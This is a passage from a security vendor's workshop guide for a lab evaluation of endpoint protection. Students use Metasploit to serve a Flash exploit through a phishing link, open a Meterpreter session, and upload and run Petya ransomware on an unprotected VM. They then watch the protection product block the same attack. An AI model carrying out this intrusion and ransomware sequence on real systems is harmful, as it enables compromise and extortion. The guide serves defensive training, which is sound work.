UTD-Advanced-Endpoint-Workshop Guide-3.1-20190822 PDF

Ultimate Test Drive - Advanced Endpoint Protection
ULTIMATE
TEST DRIVE:
Advanced Endpoint Protection
Workshop Guide
UTD-AEP 3.1 © 2019 Palo Alto Networks, Inc. | Confidential and Proprietary 20190822
Table of Contents
Activity 1 - Initiate the UTD Workshop 5

Task 1 – Log in to Your UTD Class Environment 5
Task 2 - Understand the UTD Environment Setup 6
Task 3 - Adjust Display as Necessary 8
Task 4 – Enabling the Firewall 9
Task 5 – Rename Traps Client VMs 12
Activity 2 - Conduct a Ransomware Attack 14

Task 1 - Understand the Attack Sequence 14
Task 2 - Prepare the Drive-By Download 15
Task 3 - Activate the Spear Phishing Email 16
Task 4 - Upload the Ransomware to Victim VM 18
Task 5 - Run Ransomware Malware on Victim 20
Task 6 – Revert Victim VM 22
Activity 3 – Install Traps Agents 24

Task 1 – Install Traps on Traps-Win1 24
Task 2 – Install Traps on Traps-Win2 25
Activity 4 - Explore the Traps Management Service 27

Task 1 - Access the Traps Management Service 27
Task 2 – Administer the Traps Management Service 29
Task 3 – Manage Endpoint Policy 35
Task 4 – Security Events 36
Activity 5 - Prevent Exploit Attack 39

Task 1 - Attempt Ransomware Attack 39
Task 2 – Review Traps Management Service 43
Activity 6 - Prevent Malware Attack 46

Task 1 – Review Policy Rules and Profiles 46
Task 2 - Attempt to Execute Ransomware 48
Task 3 - Create Unknown Malware 52
Task 4 - Attempt to Run Ransomware Again 53
Task 5 – Attempt to Run Ransomware from Restricted Directory 58
UTD-AEP 3.1 2
Activity 7 - Security Operating Platform in Action 62

Task 1 - Review the Security Operating Platform 62
Task 2 - Review Ransomware Attack Progression 62
Task 3 - Retrieve Ransomware Through Firewall 64
Activity 8 – Anti-Ransomware Protection 66

Task 1 – Review Anti-Ransomware Protection Module 66
Task 2 – Execute Ransomware on Victim 66
Task 3 – Attempt Execution of Ransomware on Traps Client 67
Activity 9 – Microsoft Office File Protection 71

Task 1 – Review Microsoft Office File Protection 71
Task 2 – Prepare Attacker system 71
Task 3 – Attempt Execution of Known Malicious Macro 72
Task 4 – Generate Unknown Malicious Macro 75
Activity 10 – Behavioral Threat Protection 78

Task 1 – Review Behavioral Threat Protection 78
Task 2 – Attempt Execution of Script-based Attack 78
Activity 11 – Traps on Linux 82

Task 1 – Execute Kernel Privilege Escalation on Linux 82
Task 2 – Install Traps on Traps-Linux 83
Task 3 – Attempt Execution of Kernel Privilege Escalation on Linux with Traps Agent 84
Activity 12 - Complete the UTD Evaluation 87
UTD-AEP 3.1 3
How to use this guide

The activities outlined in this Ultimate Test Drive (UTD) Workshop Guide are meant to contain all the
information necessary to navigate the workshop interface, complete the workshop activities, and troubleshoot
any potential issues with the UTD environment. This guide is meant to be used in conjunction with the
information and guidance provided by your facilitator.
Note: This workshop covers only basic topics and is not a substitute for training classes conducted by
Palo Alto Networks Authorized Training Centers (ATC). Please contact your partner or regional sales
manager for more information on available training and how to register for one near you.
UTD-AEP 3.1 4
Activity 1 - Initiate the UTD Workshop

In this activity, you will:
• Log in to the Ultimate Test Drive Workshop from your laptop
• Understand the layout of the environment and its various components
• Enable the Firewall to facilitate connectivity
Task 1 – Log in to Your UTD Class Environment

Step 1: Confirm System Requirements
Verify that your laptop is equipped with a modern browser that supports HTML 5.0. We recommend using the
latest version of Firefox or Chrome.
Step 2: Navigate to Class URL

Open a browser window and navigate to the class URL. If you have an invitation email, you can find the Class
URL and Passphrase in the invitation email. Otherwise, your instructor will provide you with the class URL and
Passphrase.
Enter your email address and the Passphrase.
Step 3: Log in to the UTD Environment

Complete the Registration form and click “Login” at the bottom.
Step 4: Enter the UTD Environment

Once you have successfully logged in, the system will automatically create a unique UTD environment for
you. Please note that this process may take a while, as indicated by the progress bar on top of the screen.
UTD-AEP 3.1 5
Once the environment has been created, the system will display a welcome page. Click “Go to my VM List” to
begin using the environment.
This will display a list of all virtual systems that constitute the UTD environment.
Take note of the “Shortcut Menu” at the top of your browser window. You will use this Shortcut Menu
throughout the workshop to switch between the available desktops.
Task 2 - Understand the UTD Environment Setup

The UTD environment consists of the following components:
A. Attacker: This virtual machine is a Kali Linux system that hosts Metasploit, a penetration testing tool.
It is the platform that you will use to take on the role of the attacker in our workshop exercises.
B. TMS: The Traps management service (TMS) is the administrative backend for Traps. It is the system
through which you will view the settings and logs of Traps for our workshop exercises.
C. Traps-Win1 & Traps-Win2: These Windows 7 virtual systems are the main workstations through
which you will carry out the exercises in our workshop. It is equipped with Traps.
D. Traps-Linux: This is a Ubuntu Linux virtual system. It is equipped with Traps.
E. Victim: This virtual system is identical to the Windows 7 Traps Client systems with one exception: it
is not equipped with Traps. You will use this system as the victim of the ransomware attack in our
workshop.
F. VM-Series Security Platform: This system is a Palo Alto Networks virtual next-generation firewall.
UTD-AEP 3.1 6
UTD-AEP 3.1 7
Task 3 - Adjust Display as Necessary

In this Task, you will learn how to adjust the CloudShare display to suit your preferences.
Step 1. Access the Traps-Win1 Desktop

In your browser, click the “Traps-Win1” tab on the Shortcut Menu that lists the available desktop environments
in the UTD. This will connect you to “Traps-Win1” through your browser.
Step 2. Modify Screen Dimensions

If the “Student Desktop” resolution is too high or too low for your laptop display, you can adjust the resolution
from the left-hand pane. You can also click the “Full screen” icon to maximize the display.
UTD-AEP 3.1 8
Note: By default, the various desktops used in this UTD rely on RDP connections over HTML 5 protocol
through the browser. A HTML5 compatible browser is required.
If you encounter connection issues with any of the desktop interfaces, click the “Reconnect” link in the left-
hand pane of the desktop display to re-establish your connection.
If reconnection to the environment remains unsuccessful, please inform the instructor for further assistance.
Task 4 – Enabling the Firewall

In your browser, click the “Traps-Win1” tab on the Shortcut Menu that lists the available desktop environments
in the UTD. This will connect you to the “Traps-Win1” desktop.
UTD-AEP 3.1 9
Step 2. Log in to the Firewall Interface

Launch the Chrome browser on “Traps-Win1”. If the page does not automatically open, click the “NGFW”
bookmark located on the Favorites bar directly below the address bar of the browser.
Accept the self-signed certificate browser warning by clicking “Advanced” and then “Proceed to 10.30.21.1
(unsafe)”. This will display the firewall authentication prompt.
Use the following credentials to log in to the Firewall:
Name: student
Password: utd135
This logs you in to the firewall and displays the main dashboard.
Step 3. Enable Firewall Interface “ethernet1/1”

Click the “Network” tab, then click the “Interfaces” node on the left-hand side. This will display all the interfaces
configured for the firewall.
Click the interface “ethernet1/1” under the “Ethernet” tab. This will display the configuration dialog box.
UTD-AEP 3.1 10
Click the “Advanced” tab and select “up” in the “Link State” drop-down to the right of the dialog box; then click
“OK” to return to the network interface listing.
Click “Commit” in the upper right-hand corner of the dashboard.
This will display a confirmation pop-up. Click “Commit” in the pop-up window to confirm your choice. This will
display the Commit Status dialog box containing a progress bar.
Once the process has completed, click “Close” in the pop-up window to return to the network interface listing.
The “Link Status” of “ethernet1/1” has turned green now that the interface is up.
UTD-AEP 3.1 11
Step 4. Verify Internet Connectivity

Open a new tab in the browser window and confirm Internet connectivity by visiting https://www.google.com.
(Note that only google-base application is enabled in the firewall policy, other web sites will be blocked.)
Once you have verified internet connectivity, close the browser by clicking the “X” in the top-right corner of the
browser’s application window.
Task 5 – Rename Traps Client VMs

This UTD shares a single Traps management service between all students. Your UTD environment consists
of virtual machines that are exact copies to other student’s environments. Due to this, the host names of the
VMs are the same and the Traps agents will show up in TMS based on the host name. In order to be able to
find your particular client and associated security events, you will rename your Traps client VMs to something
unique to you. As an example, if your name is “John Doe”, the suggestion would be to use the base name of
“jdoe”.

In your browser, click the “Traps-Win1” tab on the Shortcut Menu.
Step 2. Rename Traps-Win1

Double-click the desktop shortcut, “Rename this computer” to bring up the “System Properties” panel.
Click the “Change” button to bring up the “Computer Name/Domain Changes” window. Note, you may change
the name at “Computer description” but be sure to click the “Change” button. Editing the computer description
will not change the host name.
Change the “Computer name:” from “traps-win1” to your “basename-win1”. For example, John Doe would be
“jdoe-win1”.
Click “OK”.
In the new “Computer Name/Domain Changes” pop-up window, click “OK”.
Click “Close” in the “System Properties” panel.
When prompted, click “Restart Now”. It will take 2-3 minutes for the VM to reboot. If you do not get prompted
to restart, make sure you had clicked the “Change” button.
Click the “Reconnect” button after enough time has been given for the VM to reboot. You should be logged
back in to the desktop.
Double-click the bginfo shortcut on the desktop. You should see your new host name in the upper right-hand
corner of the screen.

In your browser, click the “Traps-Win2” tab on the Shortcut Menu.
UTD-AEP 3.1 12
Step 4. Rename Traps-Win2

Double-click the desktop shortcut, “Rename this computer” to bring up the “System Properties” panel.
Click the “Change” button to bring up the “Computer Name/Domain Changes” window.
Change the “Computer name:” from “traps-win2” to your “basename-win2”. For example, John Doe would be
“jdoe-win2”.
Click “OK”.
In the new “Computer Name/Domain Changes” pop-up window, click “OK”.
Click “Close” in the “System Properties” panel.
When prompted, click “Restart Now”. It will take a few minutes for the VM to reboot.
Click the “Reconnect” button after enough time has been given for the VM to reboot. You should be logged
back in to the desktop.
Double-click the bginfo shortcut on the desktop. You should see your new host name in the upper right-hand
corner of the screen.
Step 5. Access the Traps-Linux Console

In your browser, click the “Traps-Linux” tab on the Shortcut Menu.
Click in the Console and press “Enter”. You may ignore any CIFS related messages.
Step 6. Rename Traps-Linux

Type “hostname” in the console to see the current host name of “traps-linux”.
Type “sudo ./change_host.sh” and enter the password of “Password1!” when prompted.
Using your base name, (e.g. jdoe), type “basename-linux” for the new host name.
Type “hostname” to confirm the change was made.
End of Activity 1
UTD-AEP 3.1 13
Activity 2 - Conduct a Ransomware Attack
In this Activity, you will:

• Become the attacker and launch a ransomware attack on a victim via a drive-by download,
control the victim machine, and upload and run a ransomware malware on the system
• Experience a spear phishing attack as the victim and witness first-hand the breach of your
endpoint system
Task 1 - Understand the Attack Sequence

In this activity, you will assume the role of the Attacker and prepare and launch your ransomware attack
against a victim machine. As a prerequisite, you must understand how the attack compromises the victim
machine in this demonstration.
This ransomware attack involves two main stages:
1. Compromise endpoint via exploit
2. Deliver ransomware malware
To complete the first phase of the attack, you will use the Metasploit tool hosted on the Attacker workstation to
prepare a webserver that delivers an exploit to the victim. When the victim clicks a link in a phishing email, he
or she is redirected to the Attacker’s website, where a zero-day Flash Player exploit (CVE-2015-5119)
compromises the victim’s endpoint system.
Once the victim’s system is compromised, the Attacker uploads the ransomware malware to the victim’s
machine and executes it. This process is depicted in the figure below.
UTD-AEP 3.1 14
Task 2 - Prepare the Drive-By Download

In this task, you will configure the attacker system to serve the Hacking Team Flash zero-day exploit to the
victim in response to the request for the web page that the phishing email sent to the victim links to.
Step 1. Access the Attacker Desktop

Click the “Attacker” link on the Shortcut Menu that lists the available desktop environments in the UTD.
Step 2. Launch the Metasploit Listener

In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. This process may take a while, so please be patient.
When Metasploit has completed loading, it should display the following prompt:
“msf exploit(adobe_flash_hacking_team_uaf) >”
The attacker system is now ready and online, waiting for a connection from the victim system.
Note: If using a non-US keyboard layout, you may use the “Virtual Keyboard” in the left-hand pane to send
text.
UTD-AEP 3.1 15
Task 3 - Activate the Spear Phishing Email

In this task, you take on the role of the victim. We assume that you (as the victim) have received a spear
phishing email from the attacker, which includes a link to the attacker’s listener service that you configured in
the previous Task. You happily click the link and activate the next stage of the attack.
Step 1. Access the Victim Desktop

Click the “Victim” link on the Shortcut Menu that lists the available desktop environments in the UTD.
Note: You should not need the credentials for the user associated with the Victim VM. However, if the
system does present you with a login screen on the Victim VM, click the icon associated with the user
“Jen” and supply the password associated with that user (shown above the desktop display area). This
password is “Password1”.
UTD-AEP 3.1 16
Step 2. Launch Outlook and Access the Spear Phishing Email

Microsoft Outlook is already open and running on the desktop. An email with the subject line: “Someone has
your password” is selected and displayed in the preview pane.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login page.
At this point, the attacker has already compromised the endpoint.
UTD-AEP 3.1 17
Task 4 - Upload the Ransomware to Victim VM

As noted in Step 2 of the previous Task, the Victim was already compromised as soon as the website content
served from the Attacker systems began to display in the browser. In this Task, you will return to the role of
the Attacker, upload your ransomware onto the Victim, and infect the machine.

Click the tab that is associated with the Attacker environment.
Notice that the Metasploit listener service received a request, sent a SWF file in reply, and opened a
“Meterpreter” session to the Victim Client.
Click inside the Terminal window that is open on the desktop. Then, press the “enter/return” key a few times to
get a new Metasploit prompt.
Note: If your connection to the Attacker desktop has been severed, click the “Reconnect” link in the left-
hand pane of the desktop display area to re-establish your connection to that environment.
If you see the lock screen, click in that window and hit the Enter/Return key to get a login prompt.
Step 2. Verify Open Session to Victim

In the Terminal window on the Attacker’s desktop, type the following command to verify that you have an
active Meterpreter session to the Victim system:
sessions
This will display a list of all active sessions currently running within Metasploit.
UTD-AEP 3.1 18
An open session indicates that the Attacker has an active, direct connection to the Victim, which he or she can
use to further compromise the system.
Note the “ID” of the active session connected to the Victim. This is the “Session ID” that you will need to enter
in the next step; it should be session #1, although that might not be the case if you refreshed the browser on
the Victim desktop at any point.
Step 3. Initiate an Interactive Session with the Victim

Initiate an interactive session with the Victim by entering the following command at the Metasploit prompt (if
the “Session ID” your noted in the previous step was not “1,” remember to substitute your “Session ID” for the
number “1” in this command):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected to the Victim and can execute any number of available commands to exploit
the system. To see a list of available commands, simply type “?” and press “enter/return” at the Meterpreter
prompt.
We will not explore the available Meterpreter commands in this exercise, but feel free to scroll up and down
the list to see the available commands. These include commands such as: reboot, shutdown, and
keyscan_start (a keylogger), among others.
Step 4. Upload the Ransomware to the Victim

The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Victim by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
UTD-AEP 3.1 19
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Victim Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our ransomware attack and infect the Victim.
Task 5 - Run Ransomware Malware on Victim

For this Task, you must be prepared to quickly switch over to the tab for the Victim as soon as you have
launched the ransomware malware. This malware acts very quickly to infect a system, and if you remain in the
Attacker environment, you will miss its actions.
Step 1. Execute the Ransomware Malware on the Victim Machine

Be prepared to switch to the tab for the Victim as soon as you enter the following command at the Meterpreter
prompt (in the Attacker Terminal window):
execute -f happy.exe -H
Step 2. Witness the Ransomware Infect the Victim Machine

At this point, you should have quickly switched over to the tab for the Victim. Once the ransomware malware
begins executing on the Victim machine, it will simulate a “blue screen of death” that typically accompanies a
Windows system crash and reboot the Victim.
UTD-AEP 3.1 20
The ransomware will simulate the process of checking the disk on the Victim (the CHKDSK process).
However, the counter that indicates the progress will never stop counting.
Click the “Send ctrl+alt+delete” button in the left-hand pane of the Victim desktop display to send that key
sequence to the system.
This will display a flashing red and grey “skull and cross bone” image and prompts the user to “PRESS ANY
KEY.”
Click inside the “skull and cross bone” image and press the space bar. This should change the image to a
ransomware warning page, with demands and instructions to submit your payment in order to unlock your
system.
UTD-AEP 3.1 21
Congratulations! You are simultaneously an attacker and your own victim.
Step 3. Close the Attacker Session

On the Attacker desktop, click inside the Terminal window and press the “enter/return” key a few times to
display a Metasploit prompt.
We no longer need this attacker session, so type the following command to shut down Meterpreter:
exit
This will return you to the Metasploit prompt. Type the following command to shut down Metasploit as well.
exit
This will stop the attacker server and return you to the Terminal prompt.
Task 6 – Revert Victim VM

Our Victim VM has its master boot record encrypted by the Petya attack, so we will need to revert it to its
original state as you will use this VM again in a later Activity.
Step 1. Access the Virtual Machine List

From the “Shortcut Menu” at the top of the browser, click “VM List”. Note that the “VM List” tab is to the right
and you might need to click the right arrow icon to scroll over to it.
UTD-AEP 3.1 22
This page will show all the available VMs.
Step 2. Revert Victim Client

Scroll down to find the “Victim” VM and click “Revert” from the drop-down
Click “Revert VM” to start the revert process. This should take 5-10 minutes.
Please continue to the next Activity while this process is happening.
End of Activity 2
UTD-AEP 3.1 23
Activity 3 – Install Traps Agents

• Install Traps Agent on Windows
Task 1 – Install Traps on Traps-Win1

In this Task, you will install the Traps Agent on the Traps-Win1 environment and verify that Traps is running.

Click the “Traps-Win1” tab to display that environment.
Step 2. Install Traps Agent

Double-click the “Install Traps” icon on the desktop to launch the Traps Agent installer.
Click “Next”.
Check the box for “I accept the terms in the License Agreement” and then click “Next”.
Click “Install” and wait for the installer to complete.
Click “Finish” when done. You may notice some Action Center alerts in the System Tray due to Traps
registering itself with Windows.
UTD-AEP 3.1 24
Step 3. Open Traps Agent Console

Double-click the icon in the System Tray to open the Traps Agent console.
Traps is installed, connected and enabled.
Task 2 – Install Traps on Traps-Win2

In this Task, you will install the Traps Agent on the Traps-Win2 environment and verify that Traps is running.


Double-click the “Install Traps” icon on the desktop to launch the Traps Agent installer.
Click “Next”.
Check the box for “I accept the terms in the License Agreement” and then click “Next”.
Click “Install” and wait for the installer to complete.
UTD-AEP 3.1 25
Click “Finish” when done. You may notice some Action Center alerts in the System Tray due to Traps
registering itself with Windows.
Step 3. Open Traps Agent Console

Double-click the icon in the System Tray to open the Traps Agent console.
Traps is installed, connected and enabled. Note that “Anti-Exploit Protection” is disabled on this system. This
is a result of the “Policy Rules” applied to this endpoint. It may take a little time for the endpoint to have the
assigned policies pushed out. Instead of waiting, move to the next Task, as you will revisit this
endpoint later.
UTD-AEP 3.1 26
Activity 4 - Explore the Traps Management Service

• Access the Traps management service (TMS)
• Explore the administrative functions of Traps management service
Task 1 - Access the Traps Management Service

In this Task, you will access the Traps management service environment, a cloud-based security
infrastructure service that is designed to minimize the operational challenges associated with protecting your
endpoints. From the Traps management service, you can manage the endpoint security policy, review security
events as they occur, and perform additional analysis of associated logs.
Step 1. Access Traps Management Service

In your browser, click the “TMS” tab on the Shortcut Menu. This will connect you to a Windows desktop with a
browser already running and connected to the Traps management service tenant.
If the browser is not running, double-click the “Traps management service” icon on the desktop.
UTD-AEP 3.1 27
Step 2. Log in to Traps Management Service

Click the “Login” link to be redirected to the log in page.
Click “LOGIN” on the Single Sign On page to be logged in with the supplied credentials.
Note: The Traps management service allows the use of role-based access controls. As the
TMS you are using is shared among all classes and students, you will be using an account
assigned with the Viewer role. This account has read-only access.
Screenshots shown in this workshop guide will be from the default Super Admin role. What
you see with the Viewer role may be different from the screenshots.
UTD-AEP 3.1 28
Task 2 – Administer the Traps Management Service

In this Task, you will review the administrative functions provided by the Traps management service.
Step 1. Review Dashboard

Once you log in, you should be taken to the Dashboard. The Dashboard widgets display general information
about the Traps management service and link to filtered views by endpoint characteristic.
• Unresolved Security Events – Shows number of unresolved security events by the severity level of the
event and links to a filtered list of unresolved events by the severity that you select. By default, this chart
displays data from the last 30 days. Use the Events Time drop-down to change the data collection period.
• Platforms – Displays the total number of registered agents and the distribution of agents by platform. Also
provides links to filtered lists of endpoints for each platform.
• License – Displays information about your Traps management service license including the license
expiration date and the number of license seats that are currently allocated. To review all licensed
endpoints (excludes endpoints with Zombie or Unlicensed status), click the statistic about number of seats
used.
• Content Version – Displays the distribution of agents by content version and links to a filtered list of
endpoints by latest or outdated content versions.
After a new content update is available, agents gradually receive the latest policy as they check-in with the
Traps management service.
UTD-AEP 3.1 29
Step 2. Review Agent Installations

Select the “Endpoints” > “Agent Installations” node.
These installation packages have been previously created. The Windows and Linux install packages you see
here are the ones you installed in your environment previously. The macOS and Android installers are shown
as an example and not used in this workshop.
If you see an “Agent Version” highlighted in orange, this means there is a newer installer available.
Step 3. Review Endpoints

Select the “Endpoints” > “Endpoints” node.
This is the list of all registered endpoints. The list can be filtered using the drop-down boxes at the top of the
page. You can search for your installed endpoints by entering the base name you previously used for
“Endpoint Name”.
Note that the Windows endpoints show a green “TS” icon which indicates these were installed as a
“Temporary session” endpoint type. Other endpoint types include “Standard” as indicated by your Linux client,
“Virtual desktop infrastructure (VDI)” and Mobile.
UTD-AEP 3.1 30
Note: As an administrator the following actions can be performed from Endpoints. Your Viewer role
will not have access to this.
• Retrieve Endpoint Data from selected endpoints

• Retrieve specific files from selected endpoints
• Initiate malware scanning on selected endpoints (Windows only)
• Abort scanning on selected endpoints (Windows only)
• Upgrade Traps in selected endpoints
• Export data to a CSV file (note: this is available to the Viewer role)
• Delete endpoints
• Uninstall
Click on your traps-win1 (eg, jdoe-win1) endpoint from the list to bring up additional details regarding that
client.
Note in the above screenshot, from individual endpoints you can:

• Retrieve endpoint data
• Retrieve files
• Initiate Live Terminal (Windows only – allows you to remotely manage endpoint)
• Scan now
• Isolate endpoint (allows you to halt all network access on the endpoint except for Traps)
UTD-AEP 3.1 31
Click on the “Policy” tab to review the assigned policies and scanning report.
Step 4. Review Endpoint Groups

Select the “Endpoints” > “Endpoint Groups” node.
To easily apply policy rules to specific endpoints, you can define endpoint groups. These can be static or
dynamic. For dynamic groups, one or more criteria can be defined.
Hover the cursor over the “TrapsWin1group” and click the pencil icon to review the criteria (IPv4 address of
192.168.21.221) that was used for this group
UTD-AEP 3.1 32
Step 5. Review Actions Tracker

Select the “Monitor” > “Actions Tracker” node to monitor the progress of administrative initiated activities.
The “Actions Tracker” tracks the following activities:

• Agent upgrades
• Agent uninstalls
• Agent scans
• Halted agent scans
• Data retrieval (both security event data and tech support files)
• Quarantined file restoration
Additional details are available by clicking on the activity.
UTD-AEP 3.1 33
Step 6. Review Logs

Select the “Monitor” > “Logs” node to monitor endpoint and server logs.
Endpoint logs display entries for events monitored by the Traps agent. Server logs display entries for changes
to the Traps management service.
Step 7. Review Reports

Select the “Monitor” > “Reports” node to view previously created reports.
Admins may also create a new on-demand report or schedule reports on a daily, weekly or monthly basis to
be emailed.
UTD-AEP 3.1 34
Task 3 – Manage Endpoint Policy

In this Task, you will review the endpoint policy functions provided by the Traps management service.
Step 1. Review Profiles

Select the “Security” > “Profiles” node to view the Profiles available to Windows, macOS, Linux and Android.
Traps management service provides default security profiles that you can use out of the box to begin
protecting your endpoints from threats immediately. While security rules enable you to block or allow files to
run on your endpoints, security profiles help you customize and reuse settings across different groups of
endpoints.
• Exploit – Exploit profiles block attempts to exploit system flaws in browsers, and in the operating system.
For example, Exploit profiles help protect against exploit kits, illegal code execution, and other attempts to
exploit process and system vulnerabilities. Exploit profiles are supported for Windows, Mac, and Linux
platforms.
• Malware – Malware profiles protect against the execution of malware including trojans, viruses, worms,
and grayware. Malware profiles serve two main purposes: to define how to treat behavior common with
malware such as ransomware or script-based attacks, and to define how to treat known malware and
unknown files. Malware profiles are supported for all platforms.
• Restriction – Restrictions profiles limit where executables can run on the endpoint. For example, you can
restrict files from running from specific local folders or from removable media. Restriction profiles are
supported for Windows platforms.
• Agent Settings – Agent Settings profiles enable you to customize settings that apply to the Traps app
such as the disk space quota for log retention. For Mac and Windows platforms, you can also customize
user interface options for the Traps console such as accessibility and notifications.
Click on a Profile name to further explore the details for a given profile.
Note: Additional Profiles have been created for this workshop. Most of them disable certain functionality in
order to demonstrate the various methods of Traps multi-method prevention capabilities.
UTD-AEP 3.1 35
Step 2. Review Policy Rules

Select the “Security” > “Policy Rules” node to view the assigned Profiles based on operating system type.
The Traps management service provides out-of-the-box protection for all registered endpoints with a default
security policy for each type of platform. To fine-tune your security policy, you customize settings in a security
profile and attach that profile to a policy rule. Each policy rule that you create must apply to one or more
endpoints, endpoint groups, or Active Directory (AD) objects.
As seen here, the Endpoint Groups previously defined have your Profiles assigned. These Profiles, assigned
by Endpoint Groups should be shown in Endpoints > traps-win1 > Policy.
Task 4 – Security Events

In this Task, you will review security events provided by the Traps management service.
Step 1. Review Security Events

Select the “Security” > “Security Events” node.
A security event occurs when the Traps agent identifies an attempt to run a malicious file or process. Traps
agents report security events when the file or process matches your applied policy rules (either default policy
rules or custom rules you define). When the event occurs, Traps applies the action specified in the applied
security profile, either block the malicious activity, or allow and report the malicious activity.
UTD-AEP 3.1 36
The Traps management service ranks all events in order of severity so you can quickly and easily see the
most important events when you log in to the Traps management service. You can then drill down into the
security events to determine if a security event is a real threat and, if so, you can remediate it. In some cases,
you may determine that a security event does not pose a real threat and can create an exception for it.
Click a Security Event to get additional details, WildFire verdicts, any defined Exceptions, Comments and
History.
Note, the Status can be changed from New to Investigating or Closed as your assessment of the event
progresses.
Step 2. Review Files

Select the “Security” > “Files” node.
Each time a file attempts to run on a Mac or Windows endpoint, Traps logs the event and reports it to the
Traps management service. The Files page in the Traps management service displays all the files that run on
your endpoints, their corresponding verdicts, and other details about the files. When a security event occurs or
a specific file warrants investigation, you can review the WildFire Analysis Report, view which endpoints have
attempted to run the file, and if necessary, create an exception to override the official verdict.
Click on a file to get additional details, which endpoints have that file, WildFire verdict and any defined
exceptions.
UTD-AEP 3.1 37
Click the “Quarantine” tab to review any files previous quarantined. You can enable Traps to quarantine
malicious files on Windows endpoints as part of a Malware security profile. When malware attempts to run,
Traps automatically quarantines the file by moving it from a local or removable hard-drive to a local quarantine
folder. This isolates and prevents the file from causing any harm to your endpoints.
Step 3. Review Exceptions

Select the “Security” > “Exceptions” node.
In some cases, you may need to override the applied security policy to change whether Traps allows a
process or file to run on an endpoint. To override the security policy, you can configure any of the following
types of policy exceptions:
• Process Exception - Allow processes blocked by an exploit security module to run on an endpoint. You
can also disable all exploit protection modules for a process.
• Hash Exception - Explicitly define a verdict for a file (Benign or Malware). The Traps management service
distributes the verdict to all Traps agents that attempt to run the file. Traps will evaluate the verdict you
specify for the file instead of the WildFire verdict.
• Advanced Exceptions - Palo Alto Networks support defined exceptions that can be used to temporarily
address policy issues for specific customers.
Click on an Exception entry to review the details.
UTD-AEP 3.1 38
Activity 5 - Prevent Exploit Attack

• Attempt the same ransomware attack from our previous Activity, but this time with Traps
installed on the system
• Review Security Event on Traps management service
Task 1 - Attempt Ransomware Attack

In this task, we once again assume that you (as the victim) have received a spear phishing email from the
attacker that includes a link to the attacker’s listener service. However, you now have Traps installed on your
system. You happily click the link and activate the next stage of the attack. Because Traps is installed on the
Traps-Win1, it will prevent the ransomware attack by blocking its initial stage, which is the exploitation of
Adobe Flash Player.
Step 1. Access the Traps-Win1 Desktop and Verify Traps is Enabled

Click the “Traps-Win1” tab to access that desktop.
Note the date and time of the “Last Check-in” indicated on the bottom of the Traps-Win1 console.
Click the “Check In Now” link to reconnect to the Traps management service and retrieve any updated
security policies.
The link should change momentarily to “Connecting” and once the Traps-Win1 has completed the check-in
process, it should return to “Check In Now.”
Verify that Traps is active and that “Advanced Endpoint Protection is Enabled.”
You have now verified that Traps is running on the Traps-Win1 desktop.
Step 2. Verify that Attacker Systems Are Ready

Click the “Attacker” tab. This should display the Attacker Desktop.
UTD-AEP 3.1 39
Click inside the terminal window to activate it. Then press the “enter/return” key a few times to ensure it is
responding. If it is not, please reconnect to the Attacker desktop.
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. When Metasploit has completed loading, it should display the following
prompt

Click the “Traps-Win1” tab to display that desktop. This should return you to the Traps-Win1 desktop with the
Traps console still visible.
Step 4. Access the Spear Phishing Email in Outlook

Click the Outlook icon to launch Outlook.
This Step repeats the same sequence of actions you completed to trigger the exploitation of the Victim VM in
the previous Activity. This is necessary to observe Traps in action.
UTD-AEP 3.1 40
Click the Outlook application window to activate it. The email with the subject line: “Someone has your
password” is displayed in the inbox.
(depending on your network speed), display a webpage that resembles the Google account login website.
Recall from our previous Activity that the Attacker server detects the incoming connection and serves the
SWF file for the Hacking Team zero-day exploit in reply to the request.
At this point, Traps will detect the exploitation attempt, block it, and display a dialog box to inform you that it
has prevented the security breach.
Traps freezes the Internet Explorer processes running in the browser tab, collects forensic data about the
attack, and then terminates the exploitation attempt.
Click the “Show Details” button in the Traps prevention alert window. Then scroll down to the bottom of the list
that appear. You will notice the “Component” referenced here is “DLL security”. In this case, the Exploit
Prevention Module triggered was from an attempt to leverage a DLL on the Traps-Win1 VM.
UTD-AEP 3.1 41
Click “OK” in the Traps notification dialog box to dismiss it. This will close the dialog box and terminate the
Internet Explorer process that was targeted by the exploitation attempt.
Step 5. Verify that Traps Has Prevented the Attack

Click the “Attacker” tab. This should display the Attacker desktop.
Notice that the Attacker’s system has detected the incoming request, served the SWF file that contains the
exploit, but failed to establish an active session to the Trap Client machine.
Click inside the Terminal window on the Attacker desktop and press “enter/return” a few times to get a new
Metasploit prompt: “msf exploit (adobe_flash_hacking_team_uaf) >.”
Enter the following command at the Metasploit prompt:
sessions
This should display a response indicating that there are no active sessions.
This verifies that the Attacker’s exploitation attempt failed, despite the fact that the SWF file containing the
Hacking Team Flash zero-day exploit was delivered to the Traps-Win1 machine.
UTD-AEP 3.1 42
Step 6. Exit Outlook on Traps-Win1

Click the “Traps-Win1” tab.
Close Outlook by clicking the “X” on the top-right corner of the window.
Task 2 – Review Traps Management Service

In this Task, you will review the Traps management service and the Security Event generated from the last
Task when Traps block the ransomware attack in its initial stages.

In your browser, click the “TMS” tab on the Shortcut Menu.
Step 2. Review Dashboard

Select the “Dashboard” node.
The prevention event from the previous task is logged as a “Medium Severity” event. The number of events
will vary, determined by the selected Timeframe and how many others have performed this UTD.
Step 3. Review Security Event

Click the “Medium Severity” link on the Dashboard to be brought to the “Security Events” node with a filter in
place for your selected Timeframe and Severity.
UTD-AEP 3.1 43
You can further refine the filter by entering in the host name for your endpoint (e.g. jdoe-win1).
The prevention event was a “Memory Corruption Exploit” against iexplorer.exe. You can also see the Profile
type, Exploit, that was triggered, along with the endpoint name and user of that system.
Click on the Event link to bring up further details.
Review details of this event which includes the information from the “Security Event” overview. You will also
find additional details regarding the Module, Endpoint, Processes, Files and Users.
An administrator role can also “Retrieve and Analyze Data”. The results will be available in the “Analysis” tab
for this event. You can track its progress there as well as in the “Action Tracker” node. Other actions are
